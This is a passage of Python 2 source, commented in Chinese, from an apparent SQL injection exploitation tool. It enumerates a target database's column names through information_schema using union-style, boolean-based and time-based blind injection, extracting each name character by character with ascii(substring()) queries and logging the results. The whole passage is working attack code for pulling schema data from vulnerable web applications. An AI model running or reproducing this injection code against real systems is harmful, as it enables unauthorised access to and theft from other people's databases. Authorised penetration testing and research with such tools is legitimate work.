logger.debug("%dth Column name length sqli success...The column_name_len is %d..." % ((i + 1), column_name_len))
logger.info("[*] %dth column_name_len: %d" % ((i + 1), column_name_len))
# 然后注columns name
column_name = normal_injection(select='`column_name`',
source='information_schema.columns',
conditions="table_name = '" + table_name + "' && table_schema = '" + database_name + "'",
limit=i,
dealpayload=self.dealpayload,
data=self.Data, isStrings=True, sqlirequest=self.sqlirequest
)
logger.debug("%dth Column name sqli success...The column_name is %s..." % ((i + 1), column_name))
# 把columns_name插入列表
columns_name.append(column_name)
logger.info("[*] %dth column_name: %s" % ((i + 1), column_name))
elif self.sqlimethod == "build":
logger.debug("The sqlimethod is %s..." % self.sqlimethod)
logger.debug("Start table's %s column amount sqli..." % table_name)
retVal = build_injection(select="COUNT(`column_name`)",
source="information_schema.columns",
conditions="table_name = '" + table_name + "' && table_schema = '" + database_name + "'",
dealpayload=self.dealpayload, data=self.Data, lens=self.len,
isCount=True, sqlirequest=self.sqlirequest)
columns_number = int(retVal)
logger.debug("Columns account sqli success...The columns_number is %d..." % columns_number)
logger.info("[*] columns_number: %d" % columns_number)
for i in range(0, int(columns_number)):
# 然后注 columns_number 的 length
logger.debug("Start %dth column length sqli..." % (i + 1))
retVal = build_injection(select="length(`column_name`)",
source="information_schema.columns",
conditions="table_name = '" + table_name + "' && table_schema = '" + database_name + "'",
limit=i,
dealpayload=self.dealpayload, data=self.Data,
lens=self.len,
isCount=True, sqlirequest=self.sqlirequest)
column_name_len = int(retVal)
logger.debug("%dth Column name length sqli success...The column_name_len is %d..." % ((i + 1), column_name_len))
logger.info("[*] %dth column_name_len: %d" % ((i + 1), column_name_len))
# 然后注column名字
# 清空column_name
column_name = ""
logger.debug("Start %dth column sqli..." % (i + 1))
for j in trange(int(column_name_len), desc='%dth Column sqli' % (i + 1), leave=False):
retVal = build_injection(select="ascii(substring(`column_name`," + repr(j + 1) + ",1))",
source="information_schema.columns",
conditions="table_name = '" + table_name + "' && table_schema = '" + database_name + "'",
limit=i,
dealpayload=self.dealpayload, data=self.Data, lens=self.len,
isStrings=True, sqlirequest=self.sqlirequest)
column_name += chr(retVal)
logger.debug("%dth Column name sqli success...The column_name is %s..." % ((i + 1), column_name))
# 把columns_name插入列表
columns_name.append(column_name)
logger.info("[*] %dth column_name: %s" % ((i + 1), column_name))
elif self.sqlimethod == "time":
logger.debug("The sqlimethod is %s..." % self.sqlimethod)
logger.debug("Start table's %s column amount sqli..." % table_name)
retVal = time_injection(select="COUNT(`column_name`)",
source="information_schema.columns",
conditions="table_name = '" + table_name + "' && table_schema = '" + database_name + "'",
dealpayload=self.dealpayload, data=self.Data, times=self.time,
isCount=True, sqlirequest=self.sqlirequest)
columns_number = int(retVal)
logger.debug("Columns account sqli success...The columns_number is %d..." % columns_number)
logger.info("[*] columns_number: %d" % columns_number)
for i in range(0, int(columns_number)):
# 然后注 columns_number 的 length
logger.debug("Start %dth column length sqli..." % (i + 1))
retVal = time_injection(select="length(`column_name`)",
source="information_schema.columns",
conditions="table_name = '" + table_name + "' && table_schema = '" + database_name + "'",
limit=i,
dealpayload=self.dealpayload, data=self.Data,
times=self.time,
isCount=True, sqlirequest=self.sqlirequest)
column_name_len = int(retVal)
logger.debug("%dth Column name length sqli success...The column_name_len is %d..." % ((i + 1), column_name_len))
logger.info("[*] %dth column_name_len: %d" % ((i + 1), column_name_len))
# 然后注columns名字
# 清空column_name
column_name = ""
logger.debug("Start %dth column sqli..." % (i + 1))
for j in trange(int(column_name_len), desc='%dth Column sqli' % (i + 1), leave=False):
retVal = time_injection(select="ascii(substring(`column_name`," + repr(j + 1) + ",1))",
source="information_schema.columns",
conditions="table_name = '" + table_name + "' && table_schema = '" + database_name + "'",
limit=i,
dealpayload=self.dealpayload, data=self.Data, times=self.time,
isStrings=True, sqlirequest=self.sqlirequest)
column_name += chr(retVal)
logger.debug("%dth Column name sqli success...The column_name is %s..." % ((i + 1), column_name))
# 把columns_name插入列表
columns_name.append(column_name)
logger.info("[*] %dth column_name: %s" % ((i + 1), column_name))
# 把注入得到的columns_name列表转为元组
self.columns_name[database_name][table_name] = tuple(columns_name)
logger.info("Sqli result:")
# 输出所有的列名
for database_name in self.columns_name:
tables_name = ""
for table_name in self.columns_name[database_name]:
tables_name += table_name
tables_name += ','
columns_name = ""
for column_name in self.columns_name[database_name][table_name]:
columns_name += column_name
columns_name += ','
logger.info("Table %s has columns %s", table_name, columns_name)
logger.info("Database %s has tables %s", database_name, tables_name)
print "[*]Columns list:", self.columns_name
